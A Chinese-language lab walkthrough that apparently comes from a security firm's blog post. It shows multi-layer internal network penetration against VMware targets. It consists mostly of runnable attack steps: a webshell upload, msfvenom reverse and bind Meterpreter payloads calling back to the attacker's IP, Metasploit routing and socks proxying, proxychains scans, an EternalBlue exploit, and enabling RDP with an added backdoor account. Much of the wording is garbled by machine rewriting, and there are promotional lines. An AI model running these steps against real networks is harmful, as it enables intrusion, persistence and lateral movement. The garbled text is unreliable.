近年来,攻击者潜伏在企业内网进行攻击的安全事宜习认为常,攻击者在常常会企业的内网进行横向渗透,令防守方防不胜防。因此,我们该当严格掌握好网络区域之间的访问规则,加大攻击横向渗透的阻力。本文由锦行科技的安全研究团队供应,旨在通过实验演示进一步理解攻击者是如何在多层内网进行的渗透。
没有耐心看完的看这里:
网络安全是一门大学问,要想理解透彻还得一步一步来,对此,我整理了一份小白走向渗透的知识总结,还有视频素材,可以比拟着学习
须要的关注我:私信回答“资料”获取更多渗透测试、网络安全资料
1.实验简介网络拓扑图渗透机:win10+kali
第一层靶机 (外网web做事器): Linux
第二场靶机 (内网web做事器): Linux
第三层靶机 (内网办公机) : win7
用三层网络来仿照内外网环境,紧张理解MSF、内网转发等。
2.环境搭建第一层网络把渗透机kali和win10网卡1设置选择VMnet1:
靶机Linux网卡1设置选择VMnet1,添加网卡2 设置选择VMnet2:
第二层网络
将第二台靶机Linux网卡1设置选择VMnet2,添加网卡2 设置选择VMnet3:
第三层网络
将靶机win7网卡1设置选择VMnet3:
再配置好各台机器对应IP即可。
末了在第一台Linux和第二台Linux上搭建一个php上传页面,设为存在文件上传漏洞的web页面,以便后续的拿shell进行内网渗透。
第一台Linux第二台Linux3.实验过程第一层靶机win10访问http://192.168.85.131/直接上传一句话木马
蚁剑连接
进一步做内网渗透,上传msf后门
打开kali msfconsole 输入msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.85.128 LPORT=4444 -f elf > mshell.elf
天生一个名为mshell.elf的msf后门文件蚁剑把后门文件上传到Linux靶机返回msf 开启监听use exploit/multi/handler 利用监听模块set payload linux/x64/meterpreter/reverse_tcp 利用和木马相同的payloadset lhost 192.168.85.128 kaili 的ipset lport 4444 木马的端口run 实行
蚁剑打开虚拟终端cd到后门文件的目录下,实行后门文件,输入
chmod 777 mshell.elf 加实行权限./mshell.elf 实行文件
Kail接管到MSF会话
输入ifconfig,创造第二层172.10.10.0/24网段
添加路由
background 将会话转到后台route add 172.10.10.0/24 1添加 172.10.10.0/24网段 利用session1route print 查看路由表
利用MSF建立socks代理
use auxiliary/server/socks4aset srvhost 192.168.85.128set srvport 10080run
配置socks4代理的干系客户端Proxychains在配置文件/etc/proxychains.conf中添加:socks4 192.168.85.128 10080vi /etc/proxychains.conf
添加socks4 192.168.85.128 10080
这样利用proxychains启动的运用都可以带sock4代理,proxychains 为kali自带的,非MSF里的。
建立好代理后渗透机可以通过这台Linux当跳板机进入第二层网络
第二层网络nmap探测存在web做事的主机
用proxychans启动nmap对第二层网段进行80端口扫描,实行proxychains nmap -sT -Pn -p 80 172.10.10.0/24
扫描创造55和56存在web做事,172.10.10.56即为第二层网络的ip
由于proxychains无法代理icmp的数据包,以是必须添加-sT -Pn参数,即不检测主机是否存活,直接进行端口tcp扫描。
脚本探测存活主机
在本地创建一个名为ping.sh的脚本,脚本内容如下:
#!/bin/baship=”172.10.10.”echo “ping log:” > ./ping.txtfor i in {1..254}doping -c 1 -w 1 -W 1 $ip$i | grep -q “ttl=” && echo “$ip$i [yes]” >> ./ping.txt || echo “$ip$i [no]” >> ./ping.txt &doneecho “wait 5s….”sleep 5cat ./ping.txtcat ./ping.txt | wc -l
Kali进入session1会话,然后upload命令上传刚刚创建的脚本到靶机upload /root/ping.sh /var/www/hrml/upload
进入shell实行
python -c ‘import pty;pty.spawn(“/bin/bash”)’
创建一个完备交互式shell,后
Chmod 777 ping.sh./ping.sh
可以看到172.10.10.0/24网段存活56.57两台
知道存活主机ip后就可以连续进入第二层内网主机
渗透机浏览器配置sock4a代理
蚁剑加代理连接
连接 http://172.10.10.56/upload/php1.php
进一步做内网渗透,连续上传msf后门
制作MSF后门
返回kali msf 输入
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=4455 -f elf > mshell1.elf
天生 mshell1.elf后门文件
由于在内网跨网段时无法反向代理连接到渗透的机器,以是这里利用linux/x64/meterpreter/bind_tcp 这个payload进行正向代理连接。蚁剑上传后门
蚁剑打开虚拟终端实行后门文件
返回会话
输入ifconfig 创造第三层网络的网段10.10.10.0/24
第三层网络添加路由
backgroundroute add 10.10.10.0/24 2route print
进入session 2 上传 脚本 探测存活主机把稳把脚本的ip段修正成该网段再上传
探测到第三层网段的存活ip :10.10.10.101
proxychans 启动nmap对10.10.10.101的1-500端口扫描,实行proxychains nmap -sT -Pn -p 1-500 10.10.10.101
创造445端口开启
考试测验利用ms17-010use windows/smb/ms17_010_eternalblueset rhost 10.10.10.101set payload windows/x64/meterpreter/bind_tcpset lport 4466
Run ,存在445漏洞
实行成功,返回会话
开启3389远程桌面
run post/windows/manage/enable_rdp 开启远程桌面run post/windows/manage/enable_rdp USERNAME=zzy PASSWORD=123qwe!@# 添加远程用户
将3389端口转回kali本地5555端口portfwd add -l 5555 -p 3389 -r 10.10.10.101
Win10远程桌面连接
上岸成功网络安全是一门大学问,要想理解透彻还得一步一步来,对此,我整理了一份小白走向渗透的知识总结,还有视频素材,可以比拟着学习,大家下载就行
关注我、私信回答“资料”获取更多渗透测试、网络安全资料
好了,大概内网渗透流程便是这样子,喜好本文的转发关注我~